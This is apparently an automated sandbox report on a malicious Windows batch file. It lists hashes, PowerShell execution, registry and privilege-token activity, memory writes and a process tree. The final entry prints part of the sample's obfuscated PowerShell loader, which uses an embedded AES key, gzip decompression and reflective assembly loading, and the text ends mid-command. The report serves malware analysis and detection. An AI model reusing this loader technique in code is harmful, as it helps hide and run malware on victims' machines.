3e27d2aee2a3f3a1f28e27100ed8b966ee82a85ec94d8d715f390d824e20abba

Analysis

max time kernel
150s
max time network
128s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
02/08/2024, 14:16

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bat.bat
Size

5.8MB
MD5

f3281ed9a501fd2ff062664456bd3016
SHA1

4e41be0fe4bf26907eaa738fffaabf10651c15b5
SHA256

3e27d2aee2a3f3a1f28e27100ed8b966ee82a85ec94d8d715f390d824e20abba
SHA512

cbd41cc54655e2fc7159d4cf50c6b0424b7caf927016735bf1e84b1b69ff58cf12abcee724af99f2c0aba7e176393477c16cf183d99c48163d9b85f8e7aaf1b4
SSDEEP

98304:BAqV8T0g2Vnxg8T2D0aBBbhP9HbTEU28tf:4TNBBbhPdT/f

Score

8^/10

execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
4596	powershell.exe
3496	powershell.exe
2844	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation	WScript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies data under HKEY_USERS 49 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Classes\Local Settings\MuiCache\26\52C64B7E\@%SystemRoot%\System32\ci.dll,-101 = "Enclave"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Classes\Local Settings\MuiCache\26\52C64B7E\@%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe,-124 = "Document Encryption"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Classes\Local Settings\MuiCache\26\52C64B7E\@%SystemRoot%\System32\wuaueng.dll,-400 = "Windows Update"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Classes\Local Settings\MuiCache\26\52C64B7E\@%SystemRoot%\System32\ci.dll,-100 = "Isolated User Mode (IUM)"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Classes\Local Settings\MuiCache\26\52C64B7E\@%SystemRoot%\System32\fveui.dll,-843 = "BitLocker Drive Encryption"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Classes\Local Settings\MuiCache\26\52C64B7E\@%SystemRoot%\system32\dnsapi.dll,-103 = "Domain Name System (DNS) Server Trust"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Classes\Local Settings\MuiCache\26\52C64B7E\@%SystemRoot%\System32\fveui.dll,-844 = "BitLocker Data Recovery Agent"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Classes\Local Settings\MuiCache\26\52C64B7E\@%SystemRoot%\system32\NgcRecovery.dll,-100 = "Windows Hello Recovery Key Encryption"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs	svchost.exe

Modifies registry class 29 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PTT = "133670818129138227"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\Local Settings	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Documents"	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 14002e80922b16d365937a46956b92703aca08af0000	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	powershell.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133670818120857507"	svchost.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1	svchost.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2844	powershell.exe
2844	powershell.exe
4596	powershell.exe
4596	powershell.exe
3496	powershell.exe
3496	powershell.exe
3496	powershell.exe
3496	powershell.exe
3496	powershell.exe
3496	powershell.exe
3496	powershell.exe
3496	powershell.exe
3496	powershell.exe
3496	powershell.exe
3496	powershell.exe
3496	powershell.exe
3496	powershell.exe
3496	powershell.exe
3496	powershell.exe
3496	powershell.exe
3496	powershell.exe
3496	powershell.exe
3496	powershell.exe
3496	powershell.exe
3496	powershell.exe
3496	powershell.exe
3496	powershell.exe
3496	powershell.exe
3496	powershell.exe
3496	powershell.exe
3496	powershell.exe
3496	powershell.exe
3496	powershell.exe
3496	powershell.exe
3496	powershell.exe
3496	powershell.exe
3496	powershell.exe
3496	powershell.exe
3496	powershell.exe
3496	powershell.exe
3496	powershell.exe
3496	powershell.exe
3496	powershell.exe
3496	powershell.exe
3496	powershell.exe
3496	powershell.exe
3496	powershell.exe
3496	powershell.exe
3496	powershell.exe
3496	powershell.exe
3496	powershell.exe
3496	powershell.exe
3496	powershell.exe
3496	powershell.exe
3496	powershell.exe
3496	powershell.exe
3496	powershell.exe
3496	powershell.exe
3496	powershell.exe
3496	powershell.exe
3496	powershell.exe
3496	powershell.exe
3496	powershell.exe
3496	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2844	powershell.exe
Token: SeDebugPrivilege	4596	powershell.exe
Token: SeIncreaseQuotaPrivilege	4596	powershell.exe
Token: SeSecurityPrivilege	4596	powershell.exe
Token: SeTakeOwnershipPrivilege	4596	powershell.exe
Token: SeLoadDriverPrivilege	4596	powershell.exe
Token: SeSystemProfilePrivilege	4596	powershell.exe
Token: SeSystemtimePrivilege	4596	powershell.exe
Token: SeProfSingleProcessPrivilege	4596	powershell.exe
Token: SeIncBasePriorityPrivilege	4596	powershell.exe
Token: SeCreatePagefilePrivilege	4596	powershell.exe
Token: SeBackupPrivilege	4596	powershell.exe
Token: SeRestorePrivilege	4596	powershell.exe
Token: SeShutdownPrivilege	4596	powershell.exe
Token: SeDebugPrivilege	4596	powershell.exe
Token: SeSystemEnvironmentPrivilege	4596	powershell.exe
Token: SeRemoteShutdownPrivilege	4596	powershell.exe
Token: SeUndockPrivilege	4596	powershell.exe
Token: SeManageVolumePrivilege	4596	powershell.exe
Token: 33	4596	powershell.exe
Token: 34	4596	powershell.exe
Token: 35	4596	powershell.exe
Token: 36	4596	powershell.exe
Token: SeIncreaseQuotaPrivilege	4596	powershell.exe
Token: SeSecurityPrivilege	4596	powershell.exe
Token: SeTakeOwnershipPrivilege	4596	powershell.exe
Token: SeLoadDriverPrivilege	4596	powershell.exe
Token: SeSystemProfilePrivilege	4596	powershell.exe
Token: SeSystemtimePrivilege	4596	powershell.exe
Token: SeProfSingleProcessPrivilege	4596	powershell.exe
Token: SeIncBasePriorityPrivilege	4596	powershell.exe
Token: SeCreatePagefilePrivilege	4596	powershell.exe
Token: SeBackupPrivilege	4596	powershell.exe
Token: SeRestorePrivilege	4596	powershell.exe
Token: SeShutdownPrivilege	4596	powershell.exe
Token: SeDebugPrivilege	4596	powershell.exe
Token: SeSystemEnvironmentPrivilege	4596	powershell.exe
Token: SeRemoteShutdownPrivilege	4596	powershell.exe
Token: SeUndockPrivilege	4596	powershell.exe
Token: SeManageVolumePrivilege	4596	powershell.exe
Token: 33	4596	powershell.exe
Token: 34	4596	powershell.exe
Token: 35	4596	powershell.exe
Token: 36	4596	powershell.exe
Token: SeIncreaseQuotaPrivilege	4596	powershell.exe
Token: SeSecurityPrivilege	4596	powershell.exe
Token: SeTakeOwnershipPrivilege	4596	powershell.exe
Token: SeLoadDriverPrivilege	4596	powershell.exe
Token: SeSystemProfilePrivilege	4596	powershell.exe
Token: SeSystemtimePrivilege	4596	powershell.exe
Token: SeProfSingleProcessPrivilege	4596	powershell.exe
Token: SeIncBasePriorityPrivilege	4596	powershell.exe
Token: SeCreatePagefilePrivilege	4596	powershell.exe
Token: SeBackupPrivilege	4596	powershell.exe
Token: SeRestorePrivilege	4596	powershell.exe
Token: SeShutdownPrivilege	4596	powershell.exe
Token: SeDebugPrivilege	4596	powershell.exe
Token: SeSystemEnvironmentPrivilege	4596	powershell.exe
Token: SeRemoteShutdownPrivilege	4596	powershell.exe
Token: SeUndockPrivilege	4596	powershell.exe
Token: SeManageVolumePrivilege	4596	powershell.exe
Token: 33	4596	powershell.exe
Token: 34	4596	powershell.exe
Token: 35	4596	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3496	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 792 wrote to memory of 4568	792	cmd.exe	84
PID 792 wrote to memory of 4568	792	cmd.exe	84
PID 792 wrote to memory of 2844	792	cmd.exe	85
PID 792 wrote to memory of 2844	792	cmd.exe	85
PID 2844 wrote to memory of 4596	2844	powershell.exe	86
PID 2844 wrote to memory of 4596	2844	powershell.exe	86
PID 2844 wrote to memory of 564	2844	powershell.exe	89
PID 2844 wrote to memory of 564	2844	powershell.exe	89
PID 564 wrote to memory of 4528	564	WScript.exe	90
PID 564 wrote to memory of 4528	564	WScript.exe	90
PID 4528 wrote to memory of 2012	4528	cmd.exe	92
PID 4528 wrote to memory of 2012	4528	cmd.exe	92
PID 4528 wrote to memory of 3496	4528	cmd.exe	93
PID 4528 wrote to memory of 3496	4528	cmd.exe	93
PID 3496 wrote to memory of 3536	3496	powershell.exe	56
PID 3496 wrote to memory of 984	3496	powershell.exe	12
PID 3496 wrote to memory of 1768	3496	powershell.exe	30
PID 3496 wrote to memory of 776	3496	powershell.exe	14
PID 3496 wrote to memory of 1952	3496	powershell.exe	33
PID 3496 wrote to memory of 2540	3496	powershell.exe	43
PID 3496 wrote to memory of 2144	3496	powershell.exe	38
PID 3496 wrote to memory of 2532	3496	powershell.exe	42
PID 3496 wrote to memory of 2788	3496	powershell.exe	47
PID 3496 wrote to memory of 1540	3496	powershell.exe	27
PID 3496 wrote to memory of 4884	3496	powershell.exe	67
PID 3496 wrote to memory of 2884	3496	powershell.exe	51
PID 3496 wrote to memory of 1328	3496	powershell.exe	22
PID 3496 wrote to memory of 1524	3496	powershell.exe	26
PID 3496 wrote to memory of 932	3496	powershell.exe	11
PID 3496 wrote to memory of 2900	3496	powershell.exe	52
PID 3496 wrote to memory of 1712	3496	powershell.exe	29
PID 3496 wrote to memory of 1120	3496	powershell.exe	18
PID 3496 wrote to memory of 2780	3496	powershell.exe	46
PID 3496 wrote to memory of 1112	3496	powershell.exe	17
PID 3496 wrote to memory of 3672	3496	powershell.exe	57
PID 3496 wrote to memory of 2292	3496	powershell.exe	41
PID 3496 wrote to memory of 2684	3496	powershell.exe	45
PID 3496 wrote to memory of 712	3496	powershell.exe	69
PID 3496 wrote to memory of 4848	3496	powershell.exe	72
PID 3496 wrote to memory of 1692	3496	powershell.exe	28
PID 3496 wrote to memory of 1292	3496	powershell.exe	21
PID 3496 wrote to memory of 1488	3496	powershell.exe	25
PID 3496 wrote to memory of 1056	3496	powershell.exe	16
PID 3496 wrote to memory of 2836	3496	powershell.exe	49
PID 3496 wrote to memory of 3420	3496	powershell.exe	55
PID 3496 wrote to memory of 1836	3496	powershell.exe	32
PID 3496 wrote to memory of 1436	3496	powershell.exe	24
PID 3496 wrote to memory of 1040	3496	powershell.exe	15
PID 3496 wrote to memory of 3692	3496	powershell.exe	68
PID 3496 wrote to memory of 1228	3496	powershell.exe	20
PID 3496 wrote to memory of 1220	3496	powershell.exe	19
PID 3496 wrote to memory of 1804	3496	powershell.exe	31
PID 3496 wrote to memory of 2000	3496	powershell.exe	35
PID 3496 wrote to memory of 2192	3496	powershell.exe	40
PID 3496 wrote to memory of 812	3496	powershell.exe	8
PID 3496 wrote to memory of 1992	3496	powershell.exe	34
PID 3496 wrote to memory of 4940	3496	powershell.exe	65
PID 3496 wrote to memory of 1392	3496	powershell.exe	36
PID 3496 wrote to memory of 2572	3496	powershell.exe	75
PID 3496 wrote to memory of 2176	3496	powershell.exe	39
PID 3496 wrote to memory of 1384	3496	powershell.exe	23
PID 812 wrote to memory of 3708	812	svchost.exe	94
PID 812 wrote to memory of 3708	812	svchost.exe	94
PID 812 wrote to memory of 3708	812	svchost.exe	94

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:812
- C:\Windows\system32\backgroundTaskHost.exe
  "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
  2⤵
  PID:3708

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k RPCSS -p
1⤵
PID:932

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:984

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:776

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:1040

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p
1⤵
PID:1056

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1112

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1120

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
PID:1220

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
PID:1228

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1292

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1328

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1384

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1436

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1488

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1524

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1540

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1692

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1712

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1768

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1804

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1836

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1952

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1992

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:2000

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1392

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p
1⤵
PID:2144

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2176

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:2192

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2292

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2532

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2540

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2684

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:2780

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
- Modifies data under HKEY_USERS
PID:2788

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2836

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2884

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2900

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3420

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies registry class
PID:3536
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\bat.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:792
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dyVGy+AK/alUx4C1KZGPyURnZpXePTKfrvzd88J4h2c='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('EtptwhXr1MaRHHI/4/0emw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $JxCCm=New-Object System.IO.MemoryStream(,$param_var); $fscLF=New-Object System.IO.MemoryStream; $beNoU=New-Object System.IO.Compression.GZipStream($JxCCm, [IO.Compression.CompressionMode]::Decompress); $beNoU.CopyTo($fscLF); $beNoU.Dispose(); $JxCCm.Dispose(); $fscLF.Dispose(); $fscLF.ToArray();}function execute_function($param_var,$param2_var){ $eJqYy=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $wnjdB=$eJqYy.EntryPoint; $wnjdB.Invoke($null, $param2_var);}$pMUKG = 'C:\Users\Admin\AppData\Local\Temp\bat.bat';$host.UI.RawUI.WindowTitle = $pMUKG;$hJjhE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($pMUKG).Split([Environment]::NewLine);foreach ($cavJU in $hJjhE) { if ($cavJU.StartsWith('cypLHeqrkKMWSgQqffJU')) { 